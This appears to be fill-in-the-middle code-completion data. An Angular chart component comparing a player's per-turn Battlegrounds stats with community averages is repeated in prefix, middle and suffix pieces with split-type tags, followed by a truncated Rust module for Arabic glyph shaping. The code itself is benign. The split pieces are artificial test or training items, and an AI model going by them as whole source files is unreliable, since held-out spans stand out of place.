tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
}
| yourValues | identifier_name |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set yourValues(value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div> |
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
} | `;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml; | random_line_split |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set yourValues(value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) |
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div>
`;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml;
const tooltipWidth = tooltipEl.getBoundingClientRect().width;
const tooltipHeight = tooltipEl.getBoundingClientRect().height;
const leftOffset = yourDatapoint?.parsed != null ? 0 : 50;
const tooltipLeft = Math.max(
0,
Math.min(
tooltip.caretX - tooltipWidth / 2 + leftOffset,
chartParent.getBoundingClientRect().right - tooltipWidth,
),
);
// caret should always be positioned on the initial tooltip.caretX. However, since the
// position is relative to the tooltip element, we need to do some gymnastic :)
// 10 is because of padding
const tooltipArrowEl: any = tooltipEl.querySelector('.tooltip-arrow');
const carretLeft = tooltip.caretX - tooltipLeft - 8;
tooltipArrowEl.style.left = carretLeft + 'px';
// Display, position, and set styles for font
// Make sure the bottom doesn't go outside of the graph
let tooltipTop = tooltip.y - tooltipHeight;
const chartHeight = tooltip.chart.canvas.offsetHeight;
if (tooltipTop + tooltipHeight > chartHeight) {
tooltipTop = chartHeight - tooltipHeight - 25;
}
if (tooltipTop < 0) {
tooltipTop = 0;
}
tooltipEl.style.opacity = '1';
tooltipEl.style.left = tooltipLeft + 'px';
tooltipEl.style.top = tooltipTop + 'px';
// Set caret Position
tooltipEl.classList.remove('above', 'below', 'no-transform');
tooltipEl.classList.add('top');
},
},
},
scales: {
xAxes: {
display: showYAxis,
grid: {
color: '#841063',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
},
},
yAxes: {
display: showYAxis,
position: 'left',
grid: {
color: '#40032E',
},
ticks: {
color: '#D9C3AB',
font: {
family: 'Open Sans',
style: 'normal',
},
stepSize: stepSize,
callback: (value, index, ticks) => {
if (showYAxis || isNaN(parseInt('' + value))) {
return value;
}
return +value % stepSize === 0 ? value : null;
},
},
beginAtZero: true,
max: maxYValue,
},
},
};
return result;
}
private buildSection(
theClass: 'player' | 'average',
label: string,
turnLabel: string,
statLabel: string,
deltaLabel: string,
delta: number,
datapoint: TooltipItem<'line'>,
): string {
return `
<div class="section ${theClass}">
<div class="subtitle">${label}</div>
<div class="value">${turnLabel} ${datapoint?.label}</div>
<div class="value">${
datapoint?.formattedValue
? statLabel + ' ' + parseInt(datapoint.formattedValue).toFixed(0)
: 'No data'
}</div>
<div class="delta">${
this.showDeltaWithPrevious && delta != null
? deltaLabel.replace('{{delta}}', '' + delta.toFixed(0))
: ''
}</div>
</div>
`;
}
}
| {
tooltipEl.style.opacity = '0';
return;
} | conditional_block |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
